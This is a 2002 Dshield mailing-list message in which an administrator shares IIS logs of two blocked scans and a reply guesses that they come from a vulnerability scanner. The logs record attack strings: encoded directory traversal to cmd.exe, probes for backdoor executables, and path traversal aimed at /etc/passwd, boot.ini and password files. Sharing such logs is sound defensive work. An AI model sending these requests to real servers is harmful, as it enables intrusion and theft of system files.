2002-07-01 17:39:23 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/samples/cmd.exe 404 604 62 16 80 - - -
2002-07-01 17:39:25 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/..%255c..%255cwinnt/system32/cmd.exe 404 604 95 0 80 - - -

2002-07-01 17:39:25 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:26 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:26 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd.exe 404 604 62 16 80 - - -
2002-07-01 17:39:28 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_cnf/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:28 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:32 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd.exe 404 604 62 0 80 - - -
2002-07-01 17:39:32 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:34 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:34 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd.exe 404 604 62 0 80 - - -
2002-07-01 17:39:35 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/sensepost.exe 404 604 66 0 80 - - -
2002-07-01 17:39:35 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/cmd1.exe 404 604 61 0 80 - - -
2002-07-01 17:39:37 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/cmd.exe 404 604 60 0 80 - - -
2002-07-01 17:39:37 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:38 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:38 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/cmd.exe 404 604 62 0 80 - - -
2002-07-01 17:39:40 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/sensepost.exe 404 604 60 0 80 - - -
2002-07-01 17:39:40 80.129.106.43 - GET /<Rejected-By-UrlScan> ~/cmd1.exe
404 604 55 0 80 - - -
2002-07-01 17:39:41 80.129.106.43 - GET /<Rejected-By-UrlScan> ~/cmd.exe 404
604 54 0 80 - - -


------_=_NextPart_001_01C221DD.686AE480
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=US-ASCII">
<TITLE>Message</TITLE>

<META content="MSHTML 5.50.4916.2300" name=GENERATOR></HEAD>
<BODY>
<DIV><SPAN class=583113015-02072002><FONT face=Arial color=#0000ff
size=2>It's
clearly (at least to me, could be wrong) a vulnerability scan-- maybe
someone
pointed Nessus at you??</FONT></SPAN></DIV>
<BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px">
  <DIV></DIV>
  <DIV class=OutlookMessageHeader lang=en-us dir=ltr align=left><FONT
  face=Tahoma size=2>-----Original Message-----<BR><B>From:</B> Paul Marsh
  [mailto:pmarsh at nmefdn.org] <BR><B>Sent:</B> Tuesday, July 02, 2002 5:52
  AM<BR><B>To:</B> 'Dshield (E-mail)<BR><B>Subject:</B> [Dshield] GET
  /invalidfilename.htm???<BR><BR></FONT></DIV>
  <P><FONT size=2>Has anyone else seen the following in there logs?&nbsp;
Sorry
  for the lengthy log snippet but it's two attacks.</FONT> </P>
  <P><FONT size=2>TIA, Paul</FONT> </P>
  <P><FONT size=2>2002-07-01 14:58:07 217.82.44.2 - GET
/invalidfilename.htm -
  404 604 59 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:07
217.82.44.2
  - GET /invalidfilename.cgi - 404 604 59 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 14:58:50 217.82.44.2 - GET /&lt;Rejected-By-UrlScan&gt;
  ~/cgi-bin/auktion.pl 404 604 58 15 80 - - -</FONT> <BR><FONT
size=2>2002-07-01
  14:58:50 217.82.44.2 - GET /&lt;Rejected-By-UrlScan&gt;
  ~/cgi-bin/simplestguest.cgi 404 604 65 47 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 14:58:50 217.82.44.2 - GET /msadc/msadcs.dll - 404 604
56 0
  80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/script/tools/newdsn.exe 404 604 63 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-winuploader.exe 404 604 59 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/imagemap.exe 404 604 60 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/shop.cgi 404 604 56 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/textcounter.pl 404 604 62 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/iisadmin/ism.dll 404 604 64 0
80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/samples/ctguestb.idc 404 604 68 0
80 -
  - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/perl.exe 404 604 56 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET /msadc/samples/ -
404
  604 54 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50
217.82.44.2 -
  GET /msadc/Samples/SELECTOR/showcode.asp - 404 604 75 16 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/..%c0%af../..%c0%af../sensepost.exe 404 604
82
  0 80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET /etc/passwd - 404
604 83
  0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/default.asp%20.pl 404 604 65 0
80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/fpcount.exe 404 604 59 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
/iisadmpwd/ -
  404 604 50 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50
217.82.44.2
  - GET /_vti_pvt/users.pwd - 404 604 58 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 14:58:50 217.82.44.2 - GET /graphics/sml3com - 404 604
56 0
  80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt;

~/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.ex
e
  404 604 126 0 80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET /index.php
  |=../../../../../../../../etc/passwd 404 604 87 0 80 - - -</FONT>
<BR><FONT
  size=2>2002-07-01 14:58:50 217.82.44.2 - GET /index.php
  |=forum/view.php&amp;topic=../../../../../../../etc/passwd 404 604 104 0
80 -
  - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:51 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/..%c0%af../..%c0%af../cmd1.exe 404 604 77 0
80
  - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:51 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/C:/temp/\../ 404 604 52 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:51 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt;
  ~/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 111
0
  80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:51 217.82.44.2 - GET /index.php
  l=../../../../../../../../etc/passwd 404 604 86 16 80 - - -</FONT>
<BR><FONT
  size=2>2002-07-01 14:58:51 217.82.44.2 - GET /index.php
  l=forum/view.php&amp;topic=../../../../../../../etc/passwd 404 604 104 0
80 -
  - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:51 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/..%c0%af../..%c0%af../cmd.exe 404 604 76 0
80 -
  - -</FONT> <BR><FONT size=2>2002-07-01 14:58:52 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/..\..\..\..\..\autoexec.bat 404 604 67 0
80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:52 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt;
  ~/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604
109 0
  80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:53 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/iisadmpwd/sensepost.exe 404 604 70 15
80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:53 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/..\..\..\boot.ini 404 604 57 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:53 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt;
  ~/_vti_bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604
108 0
  80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:53 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/iisadmpwd/cmd1.exe 404 604 65 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:53 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/../../../boot.ini 404 604 57 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:53 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt;
  ~/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 105 0
80
  - - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:55 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/iisadmpwd/cmd.exe 404 604 64 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:55 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt;
~/scripts/..%255c..%255cwinnt/system32/cmd.exe
  404 604 95 0 80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 14:58:56 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/samples/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:56 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/samples/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:59 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/samples/cmd.exe 404 604 62 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:59 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:59:01 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:01 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/cmd.exe 404 604 62 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:02 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_cnf/sensepost.exe 404 604 68 16 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:59:06 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_cnf/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:06 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_cnf/cmd.exe 404 604 62 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:07 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_bin/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:59:07 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_bin/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:09 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_bin/cmd.exe 404 604 62 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:09 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/msadc/sensepost.exe 404 604 66 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:59:10 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/msadc/cmd1.exe 404 604 61 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:14 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/msadc/cmd.exe 404 604 60 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:14 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:59:16 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:16 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/cmd.exe 404 604 62 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:17 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/sensepost.exe 404 604 60 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:59:18 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cmd1.exe 404 604 55 0 80 - - -</FONT>
<BR><FONT
  size=2>2002-07-01 14:59:18 217.82.44.2 - GET /&lt;Rejected-By-UrlScan&gt;
  ~/cmd.exe 404 604 54 0 80 - - -</FONT> </P><BR>
  <P><FONT size=2>2002-07-01 17:38:03 80.129.106.43 - GET /index.asp - 200
21849
  40 703 80 - - -</FONT> <BR><FONT size=2>2002-07-01 17:38:34
80.129.106.43 -
  GET /invalidfilename.htm - 404 604 59 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 17:38:34 80.129.106.43 - GET /invalidfilename.cgi - 404
604
  59 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 -
GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/auktion.pl 404 604 58 16 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/imagemap.exe 404 604 60 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/shop.cgi 404 604 56 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/textcounter.pl 404 604 62 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-winuploader.exe 404 604 59 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/iisadmin/ism.dll 404 604 64 0
80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/samples/ctguestb.idc 404 604 68 0
80 -
  - -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /msadc/msadcs.dll - 404 604 56 0 80 - - -</FONT> <BR><FONT
size=2>2002-07-01
  17:39:17 80.129.106.43 - GET /&lt;Rejected-By-UrlScan&gt;
  ~/cgi-bin/simplestguest.cgi 404 604 65 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 17:39:17 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/script/tools/newdsn.exe 404 604 63 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 17:39:17 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/scripts/perl.exe 404 604 56 16 80 - - -</FONT> <BR><FONT
size=2>2002-07-01
  17:39:17 80.129.106.43 - GET /msadc/samples/ - 404 604 54 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /msadc/Samples/SELECTOR/showcode.asp - 404 604 75 16 80 - - -</FONT>
<BR><FONT
  size=2>2002-07-01 17:39:17 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/..%c0%af../..%c0%af../sensepost.exe 404 604 82 0 80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/default.asp%20.pl 404 604 65 0
80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
/etc/passwd
  - 404 604 83 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 17:39:17
  80.129.106.43 - GET /&lt;Rejected-By-UrlScan&gt; ~/scripts/fpcount.exe 404
604
  59 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 -
GET
  /_vti_pvt/users.pwd - 404 604 58 0 80 - - -</FONT> <BR><FONT
size=2>2002-07-01
  17:39:17 80.129.106.43 - GET /iisadmpwd/ - 404 604 50 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt;

~/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.ex
e
  404 604 126 0 80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET
/graphics/sml3com -
  404 604 56 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 17:39:17
  80.129.106.43 - GET /index.php
  |=forum/view.php&amp;topic=../../../../../../../etc/passwd 404 604 104 0
80 -
  - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:17 80.129.106.43 - GET /index.php
  |=../../../../../../../../etc/passwd 404 604 87 0 80 - - -</FONT>
<BR><FONT
  size=2>2002-07-01 17:39:18 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/..%c0%af../..%c0%af../cmd1.exe 404 604 77 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 17:39:18 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/C:/temp/\../ 404 604 52 15 80 - - -</FONT> <BR><FONT size=2>2002-07-01
  17:39:18 80.129.106.43 - GET /&lt;Rejected-By-UrlScan&gt;
  ~/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 111
0
  80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:18 80.129.106.43 - GET /index.php
  l=forum/view.php&amp;topic=../../../../../../../etc/passwd 404 604 104 0
80 -
  - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:18 80.129.106.43 - GET /index.php
  l=../../../../../../../../etc/passwd 404 604 86 0 80 - - -</FONT>
<BR><FONT
  size=2>2002-07-01 17:39:18 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/..%c0%af../..%c0%af../cmd.exe 404 604 76 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 17:39:18 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/..\..\..\..\..\autoexec.bat 404 604 67 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 17:39:18 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604
109 0
  80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:19 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/iisadmpwd/sensepost.exe 404 604 70 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:19 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/..\..\..\boot.ini 404 604 57 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:19 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt;
  ~/_vti_bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604
108 0
  80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:19 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/iisadmpwd/cmd1.exe 404 604 65 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:21 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/../../../boot.ini 404 604 57 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:22 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/iisadmpwd/cmd.exe 404 604 64 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:22 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/samples/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:23 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/samples/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:23 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt;
  ~/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 105 0
80
  - - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:23 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/samples/cmd.exe 404 604 62 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:25 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt;
~/scripts/..%255c..%255cwinnt/system32/cmd.exe
  404 604 95 0 80 - - -</FONT></P>
  <P><FONT size=2>2002-07-01 17:39:25 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:26 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:26 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/cmd.exe 404 604 62 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:28 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_cnf/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:28 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_cnf/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:32 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_cnf/cmd.exe 404 604 62 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:32 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_bin/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:34 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_bin/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:34 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/vti_bin/cmd.exe 404 604 62 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:35 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/msadc/sensepost.exe 404 604 66 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:35 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/msadc/cmd1.exe 404 604 61 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:37 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/msadc/cmd.exe 404 604 60 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:37 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/sensepost.exe 404 604 68 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 17:39:38 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/cmd1.exe 404 604 63 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:38 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/cmd.exe 404 604 62 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:40 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/sensepost.exe 404 604 60 0 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 17:39:40 80.129.106.43 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cmd1.exe 404 604 55 0 80 - - -</FONT>
<BR><FONT
  size=2>2002-07-01 17:39:41 80.129.106.43 - GET
/&lt;Rejected-By-UrlScan&gt;
  ~/cmd.exe 404 604 54 0 80 - - -</FONT> </P></BLOCKQUOTE></BODY></HTML>

------_=_NextPart_001_01C221DD.686AE480--



--__--__--

_______________________________________________
Dshield mailing list
Dshield at dshield.org
http://www.dshield.org/mailman/listinfo/list


End of Dshield Digest




More information about the list mailing list